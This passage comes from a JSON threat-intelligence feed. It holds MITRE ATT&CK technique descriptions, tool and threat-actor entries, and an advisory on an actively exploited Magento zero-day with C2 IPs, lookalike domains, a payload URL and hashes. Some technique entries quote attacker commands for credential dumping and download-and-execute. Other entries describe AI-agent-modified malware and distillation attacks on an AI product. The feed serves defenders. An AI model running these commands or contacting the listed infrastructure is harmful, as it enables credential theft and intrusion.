a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", "created_on": "2020-12-24T03:00:38.000Z", "name": "Web Shell"}, {"id": "9cc48241-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Windows Command Shell"}, {"id": "f5bb6633-791c-4ae1-b275-49f5d3120d0e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the \u201cBack up...\u201d button on the \u201cStored User Names and Passwords\u201d GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", "created_on": "2021-07-22T15:52:33.000Z", "name": "Windows Credential Manager"}, {"id": "fa875301-711a-4461-94f3-d67b51942900", "category": "trellix-tool", "description": "WordPress is a web content management system originally created as a tool that was used to publish blogs, it has since evolved to publishing web content, including websites, mailing lists and Internet forums, media galleries, membership sites, as well as learning management systems and online stores.\r\n\r\nSource: wordpress.org", "created_on": "2024-09-06T21:14:23.000Z", "name": "WordPress"}, {"id": "b5f85bb1-a3df-487e-9b16-40b935863515", "category": "trellix-tool", "description": "WPPConnect is an open-source project that enables developers to interact with WhatsApp through a JavaScript-based API. It functions by automating WhatsApp Web in a Node.js environment, allowing for the creation of bots and other applications that can send and receive messages, manage contacts and groups, and perform various other actions on the WhatsApp platform. This tool is designed for developers looking to build custom solutions and integrations with WhatsApp for purposes such as customer service automation, sending notifications, and creating interactive chat experiences. It is an unofficial interface and is not endorsed by WhatsApp.", "created_on": "2025-10-16T00:15:50.000Z", "name": "WPPConnect"}, {"id": "db98b3e3-a2af-44cc-9ff6-6891a0a07297", "category": "trellix-tool", "description": "Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.\r\n\r\n(WScript is a legitimate Microsoft tool. However, cyber criminals may use it to run different types of malicious programs.)\r\n\r\n\r\nSource: Microsoft", "created_on": "2021-11-04T05:15:09.000Z", "name": "wscript"}, {"id": "84ca3d43-c721-4834-a9c7-75f9bdcf16c9", "category": "trellix-tool", "description": "WUEngine is a Windows malware component of the GTG-20006 toolkit, observed on victim systems as WUEngine.exe. Its name and the campaign's documented technique of freezing a victim machine's security updates are aligned, the intent being to prevent newly published detection signatures from being retrieved or run so that companion implants remain undetected. Like the rest of the actor's toolkit, it was iteratively modified and rebuilt by AI agents to evade endpoint defenses and was delivered alongside credential-stealing payloads via fake update-themed social-engineering lures.", "created_on": "2026-09-12T00:12:32.000Z", "name": "WUEngine"}, {"id": "fd1b3bb4-2e84-427f-8b1d-01952d2e473d", "category": "trellix-threat-actor", "description": "Xiaomi Corporation is a major consumer technology manufacturer known for producing smartphones, smart home equipment, and electric vehicles. The enterprise conducted an unauthorized distillation campaign by intercepting user conversations and coding sessions from its native MiMo models and replaying them to Claude. Rather than delivering the resulting outputs back to its end users, Xiaomi saved the complete requests and generated responses to build up its internal datasets.", "created_on": "2026-09-14T16:11:58.000Z", "name": "Xiaomi"}, {"id": "7bb874f4-9286-45b7-85d4-338f8157da22", "category": "trellix-threat-actor", "description": "Z.ai, formerly known as Zhipu AI, is a major technology company responsible for developing the GLM series of open-weight large language models. The organization used hundreds of fraudulent accounts to run an extraction pipeline against Claude, utilizing the platform to refine reasoning traces, as well as evaluate and standardize its training data. Prior to a major model release, the firm executed a targeted distillation effort focused on the cybersecurity capabilities of leading American frontier models, generating over 3.4 million exchanges.", "created_on": "2026-09-14T16:11:58.000Z", "name": "Zhipu AI"}], "metrics": [{"date": "2026-09-12", "nodes": 3.12, "events": 33.42, "sectors": [{"sector": "Unknown", "affected": 16.42, "events": 271.18, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 500000, "events": 500000, "total": 1000000}, {"sector": "Education", "affected": 6.09, "events": 6.09, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 1.64, "total": 1000000}, {"sector": "Process Manufacturing", "affected": 27.31, "events": 27.31, "total": 1000000}, {"sector": "Retail", "affected": 17.33, "events": 17.33, "total": 1000000}, {"sector": "Outsourcing & Hosting", "affected": 0.97, "events": 0.97, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 6.95, "events": 109.93, "total": 1000000}, {"iso_code": "TR", "affected": 33.61, "events": 33.61, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 10.87, "total": 1000000}, {"iso_code": "IL", "affected": 62.39, "events": 62.39, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 6.49, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 2.11, "events": 9.6, "sectors": [{"sector": "Unknown", "affected": 8.54, "events": 71.57, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 250000, "events": 250000, "total": 1000000}, {"sector": "Education", "affected": 6.09, "events": 6.09, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 1.64, "total": 1000000}, {"sector": "Outsourcing & Hosting", "affected": 1.95, "events": 1.95, "total": 1000000}, {"sector": "Process Manufacturing", "affected": 27.31, "events": 27.31, "total": 1000000}, {"sector": "Retail", "affected": 17.33, "events": 17.33, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 28.81, "events": 28.81, "total": 1000000}, {"iso_code": "US", "affected": 2.94, "events": 28.08, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 10.87, "total": 1000000}, {"iso_code": "IL", "affected": 62.39, "events": 62.39, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "HR", "affected": 62.52, "events": 62.52, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 6.72, "total": 1000000}, {"iso_code": "PE", "affected": 26.02, "events": 26.02, "total": 1000000}, {"iso_code": "UA", "affected": 36.11, "events": 36.11, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 2.26, "events": 18.19, "sectors": [{"sector": "Unknown", "affected": 9.85, "events": 143.14, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 250000, "events": 250000, "total": 1000000}, {"sector": "Education", "affected": 6.09, "events": 6.09, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 1.64, "total": 1000000}, {"sector": "Process Manufacturing", "affected": 27.31, "events": 27.31, "total": 1000000}, {"sector": "Retail", "affected": 17.33, "events": 17.33, "total": 1000000}, {"sector": "Outsourcing & Hosting", "affected": 0.97, "events": 0.97, "total": 1000000}, {"sector": "Software", "affected": 9.07, "events": 18.14, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 3.74, "events": 56.97, "total": 1000000}, {"iso_code": "TR", "affected": 24.01, "events": 24.01, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 10.87, "total": 1000000}, {"iso_code": "IL", "affected": 62.39, "events": 62.39, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 6.72, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 3.36, "events": 28.73, "sectors": [{"sector": "Unknown", "affected": 19.04, "events": 231.79, "total": 1000000}, {"sector": "Process Manufacturing", "affected": 40.97, "events": 54.63, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 250000, "events": 250000, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 1.64, "total": 1000000}, {"sector": "Outsourcing & Hosting", "affected": 1.95, "events": 1.95, "total": 1000000}, {"sector": "Retail", "affected": 17.33, "events": 17.33, "total": 1000000}, {"sector": "Education", "affected": 3.05, "events": 3.05, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 7.76, "events": 93.61, "total": 1000000}, {"iso_code": "TR", "affected": 24.01, "events": 24.01, "total": 1000000}, {"iso_code": "IL", "affected": 93.58, "events": 124.77, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 10.87, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 32.82, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 1.95, "events": 12.57, "sectors": [{"sector": "Outsourcing & Hosting", "affected": 2.92, "events": 6.81, "total": 1000000}, {"sector": "Unknown", "affected": 11.82, "events": 98.49, "total": 1000000}, {"sector": "Education", "affected": 3.05, "events": 3.05, "total": 1000000}, {"sector": "Government", "affected": 0.82, "events": 0.82, "total": 1000000}, {"sector": "Retail", "affected": 8.67, "events": 8.67, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 19.2, "events": 38.41, "total": 1000000}, {"iso_code": "US", "affected": 2.14, "events": 28.62, "total": 1000000}, {"iso_code": "IN", "affected": 15, "events": 61.66, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 32.4, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 65.64, "total": 1000000}, {"iso_code": "ES", "affected": 5.44, "events": 5.44, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "c971fdee-a4f0-4bf8-bbe7-207705db243a", "threat_level_id": 2, "description": "Sansec discovered StyleSmuggler, a zero-day vulnerability (CVE-2026-75650) in Magento and Adobe Commerce that allows unauthenticated attackers to achieve remote code execution. Attacks began September 4, 2026, with Adobe releasing an emergency hotfix on September 7 rated CVSS 10.0. The vulnerability affects all versions from 2.4.4 through 2.4.9. The attack works by injecting malicious code into Magento's template system using the 'styles' properties to evade safeguards, then executing poisoned code via a failed payment email. Successful exploitation deploys a backdoor background process disguised as legitimate system processes (kworker, fc-cache, or chronyd) that connects to C2 servers via WebSocket over TLS or custom NTP-shaped UDP traffic. The Rust-based implant establishes persistence through cron entries and awaits commands, though Sansec reports no indication the backdoor has been weaponized. A second, unrelated attacker has been observed exploiting the same vulnerability to deploy PHP web shells. Adobe recommends applying the VULN-39341 hotfix and rotating all encryption keys and credentials.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Sansec and shared publicly https://sansec.io/research/stylesmuggler-0day", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://sansec.io/research/stylesmuggler-0day"]}, "is_coat": 0, "name": "Magento Adobe Commerce Zero-Day RCE Under Active Attack (CVE-2026-75650)", "prevalence": {"countries": [{"iso_code": "US", "affected": 15.25, "events": 96.82, "total": 1000000}, {"iso_code": "TR", "affected": 96.02, "events": 240.05, "total": 1000000}, {"iso_code": "PL", "affected": 81.41, "events": 108.55, "total": 1000000}, {"iso_code": "DE", "affected": 3.63, "events": 9.86, "total": 1000000}, {"iso_code": "HK", "affected": 43.08, "events": 137.86, "total": 1000000}, {"iso_code": "TH", "affected": 48.59, "events": 80.99, "total": 1000000}, {"iso_code": "VE", "affected": 76.59, "events": 191.48, "total": 1000000}, {"iso_code": "AE", "affected": 22.42, "events": 112.1, "total": 1000000}, {"iso_code": "BR", "affected": 5.6, "events": 8.4, "total": 1000000}, {"iso_code": "KE", "affected": 207.19, "events": 932.35, "total": 1000000}, {"iso_code": "LU", "affected": 26.71, "events": 26.71, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 15.44, "total": 1000000}, {"iso_code": "SG", "affected": 6.44, "events": 32.22, "total": 1000000}], "events": 38.5, "nodes": 8.67, "sectors": [{"sector": "Unknown", "affected": 59.1, "events": 292.85, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 1500000, "events": 3375000, "total": 1000000}, {"sector": "Government", "affected": 3.29, "events": 7.4, "total": 1000000}, {"sector": "Construction", "affected": 16.26, "events": 32.52, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip_port", "value": "99.84.67.186:443"}, {"type": "ip_port", "value": "185.157.160.251:123"}, {"type": "ip", "value": "209.141.43.95"}, {"type": "ip", "value": "88.216.72.181"}, {"type": "ip", "value": "182.182.152.48"}, {"type": "ip", "value": "76.31.99.207"}, {"type": "ip", "value": "209.73.130.148"}, {"type": "ip", "value": "77.239.124.107"}, {"type": "domain", "value": "247.cdnflare.xyz"}, {"type": "domain", "value": "windwsecurity.run"}, {"type": "domain", "value": "ntp.timesysnc.net"}, {"type": "domain", "value": "time.microsft.run"}, {"type": "domain", "value": "pool.microsft.studio"}, {"type": "domain", "value": "ntp.timesync.to"}, {"type": "domain", "value": "ntp.synctime.to"}, {"type": "domain", "value": "ntp.syncstime.to"}, {"type": "domain", "value": "457cfa2fb7p5.daf892t5qau4og8pi4cghbc6fhm1dim3u.oast.site"}, {"type": "domain", "value": "daf892t5qau4og8pi4cghbc6fhm1dim3u.oast.site"}, {"type": "url", "value": "https://www.incofar.it/js/jquery/plugins/ajaxfileupload/mag.txt"}, {"type": "md5", "value": "d4a15b847786c75a383ce0cb0e5e139d"}, {"type": "sha1", "value": "d342d8223a362791ce2cc1ab45725eb0a37fd559"}, {"type": "sha256", "value": "e315687a1dfe61ef4a5a5642214db6d3b2b05d81391285eebc2af664641a26a7"}, {"type": "md5", "value": "a07bc08eded18cc7317216cbbd7032d2"}, {"type": "sha256", "value": "b79dfdc1eed860e0b76c629d6adfce251db379b0b45a6d728d4ef483f7551420"}, {"type": "sha1", "value": "11d6a0c1000576915584c49c7039206bbb4c24d1"}, {"type": "md5", "value": "4c2be4278efd226ea081e0123887ed8e"}, {"type": "sha256", "value": "4352cabaa451e5a894535fbcc4d46628701303322a13745cb5479d7d0534ae8e"}, {"type": "sha1", "value": "88523feb7fa8d25244298a54763bbd84dd351759"}, {"type": "md5", "value": "5fba2219d8715ff5026288aeea604c2f"}, {"type": "sha1", "value": "0c0d5b60fa20db9f5b35f8a641b8ea71fe92bc9f"}, {"type": "sha256", "value": "d2fbf9eb75c495bfea48790d3b228fab0c15a282419c3d3f5e49294c4e1a3e82"}, {"type": "md5", "value": "63290e1c707a7ff9e1c7c56428d3f656"}, {"type": "sha256", "value": "1a3374ffac5b0a62467612f264c49792d206304d4514409c982325c91231375d"}, {"type": "sha1", "value": "15d35ff26fe5640be1ad12f3065472b95d79f4b2"}, {"type": "sha256", "value": "d61217ca0bca83204302fa7b41935ce36f73764559c156d5c980f2fedddffb6e"}], "galaxies": [{"id": "924bf157-344a-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems.  The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.\n\nAn adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023)", "created_on": "2020-12-02T03:00:45.000Z", "name": "Cron"}, {"id": "4c976168-8a29-4c18-8ab6-a5bd3cdd1b4e", "category": "trellix-cve-database", "description": "Adobe Commerce is affected by an Improper Neutralization of Special Elements Used in a Template Engine vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.", "created_on": "2026-09-09T00:14:26.000Z", "name": "CVE-2026-75650"}, {"id": "64e15198-ae65-11eb-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2021-05-06T12:20:07.000Z", "name": "eCommerce"}, {"id": "1ced1cfa-47f2-43e7-a9fd-fe7c01f41dde", "category": "mitre-attack-pattern", "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)", "created_on": "2024-01-24T22:14:07.000Z", "name": "Exfiltration Over Webhook"}, {"id": "c35f02b0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Exploit Public-Facing Application"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "f9956fec-a156-4635-bd42-766718ac5240", "category": "mitre-attack-pattern", "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", "created_on": "2021-08-04T13:00:42.000Z", "name": "Junk Data"}, {"id": "beab4bcf-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Masquerade Task or Service"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "e4b57f41-604b-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", "created_on": "2021-01-27T03:01:04.000Z", "name": "Protocol Impersonation"}, {"id": "df1c88c4-9cae-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-23T04:35:46.000Z", "name": "Retail"}, {"id": "3c5609a5-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", "created_on": "2020-12-04T22:51:24.000Z", "name": "System Checks"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "c452e2d0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will 